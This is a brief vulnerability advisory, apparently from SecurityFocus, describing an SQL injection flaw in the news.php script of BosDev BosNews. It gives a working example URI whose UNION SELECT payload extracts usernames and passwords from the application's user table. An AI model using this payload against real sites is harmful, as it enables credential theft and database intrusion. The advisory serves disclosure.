BosDev BosNews 'news.php' SQL Injection Vulnerability

An attacker can use a browser to exploit these issues.

The following example URI is available:

http://www.example.com/path/news.php?news=more&article=248+union%20select%200,1,username,password,4%20from%20bosdevUUS/*


 

Privacy Statement
Copyright 2010, SecurityFocus